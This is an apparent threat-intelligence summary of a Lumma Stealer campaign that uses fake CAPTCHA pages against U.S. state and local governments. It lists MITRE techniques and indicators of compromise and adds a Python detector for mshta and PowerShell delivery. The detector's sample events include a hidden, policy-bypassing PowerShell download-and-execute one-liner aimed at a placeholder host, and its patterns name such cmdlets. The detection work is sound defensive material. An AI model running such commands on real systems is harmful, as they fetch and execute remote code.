The Lumma Stealer malware has been observed targeting U.S. State, Local, Tribal, and Territorial (SLTT) government organizations through fake CAPTCHA verification pages that trick users into executing malicious PowerShell scripts. The malware, sold as a Malware-as-a-Service, specializes in stealing sensitive data. Cyber threat actors use a variety of deceptive tactics and defense evasion techniques to deliver the malware and avoid detection.
Affected: U.S. State, Local, Tribal, and Territorial government organizations
Key points:
- Lumma Stealer malware targets SLTT government organizations in the U.S.
- Misinformation campaigns use fake CAPTCHA verification prompts.
- Malware is delivered through obfuscated JavaScript and PowerShell scripts.
- Lumma Stealer is offered as a Malware-as-a-Service by threat actors.
- It steals personally identifiable information (PII), including credentials and banking data.
- Multiple defense evasion techniques are used, including DLL sideloading and PowerShell.
- Indicators of compromise (IOCs) have been listed for threat hunting purposes.
MITRE Techniques:
- T1583.001 Acquire Infrastructure: Domains – Cyber threat actors acquire malicious domains for deploying their malware.
- T1583.008 Acquire Infrastructure: Malvertising – Malvertisements are used as an initial infection vector.
- T1189 Drive-by Compromise – Victims are redirected to malicious websites via compromised ads.
- T1059.001 Command and Scripting Interpreter: PowerShell – Malicious PowerShell scripts are executed to deliver the malware payload.
- T1218.005 System Binary Proxy Execution: Mshta – The Mshta utility executes malicious scripts.
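As an added defender-side example (not code from the CIS report), the following Python flags process-creation events that match the delivery chain above: mshta.exe launched with a remote URL (T1218.005), or PowerShell run with download-and-execute cmdlets and hidden/bypass/encoded flags (T1059.001). It also adds a signal when the parent is explorer.exe, on the assumption that the fake CAPTCHA page has the user paste the command into the Windows Run dialog; the event fixtures, field names and domains are constructed for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon EID 1 / Security 4688 style).
# Illustrative fixtures only; none of these values come from the CIS report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/verify"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "irm https://example.invalid/x | iex"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\installer.hta"},
    {"parent": r"C:\Program Files\Admin\runbook.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

URL_RE = re.compile(r"https?://", re.I)
# PowerShell cmdlets/aliases that fetch or evaluate remote content
PS_EXEC_RE = re.compile(
    r"(?<![\w-])(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest"
    r"|downloadstring)(?![\w-])", re.I)
# Flags that hide the window, skip the profile, bypass policy or pass an encoded command
PS_FLAG_RE = re.compile(
    r"(?<!\S)-(w(indowstyle)?\s+hidden|nop(rofile)?\b|e(xecutionpolicy|p)?\s+bypass"
    r"|enc(odedcommand)?\b|e\b)", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the reasons an event matches the fake-CAPTCHA delivery pattern (empty if none)."""
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    reasons = []
    if image == "mshta.exe" and URL_RE.search(cmd):
        reasons.append("mshta.exe fetching remote content (T1218.005)")
    if image in ("powershell.exe", "pwsh.exe"):
        if URL_RE.search(cmd) and PS_EXEC_RE.search(cmd):
            reasons.append("PowerShell download-and-execute one-liner (T1059.001)")
        if PS_FLAG_RE.search(cmd):
            reasons.append("PowerShell hidden/bypass/encoded flags (T1059.001)")
    # Assumption: the lure has the user paste into Win+R, so the parent is explorer.exe
    if reasons and parent == "explorer.exe":
        reasons.append("launched interactively under explorer.exe (Run dialog lure)")
    return reasons

def scan(events):
    """Return (index, reasons) for every event that matched at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

Events 0 and 1 are flagged; the local .hta install and the scheduled backup script (events 2 and 3) are not, which is the false-positive boundary a production rule should keep tuning against.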
Indicators of Compromise:
- [IP Address] 104[.]21[.]37[.]171
- [IP Address] 13[.]107[.]246[.]38
- [Domain] absolutepicks[.]shop
- [SHA256 Hash] C0F74200267A768EB6F8A392A708C9CEDE9062E0E9D4391040AE94B495450D0D
- [Domain] botcheck-encrypted-system[.]b-cdn[.]net
Full Story: https://www.cisecurity.org/insights/blog/active-lumma-stealer-campaign-impacting-us-sltts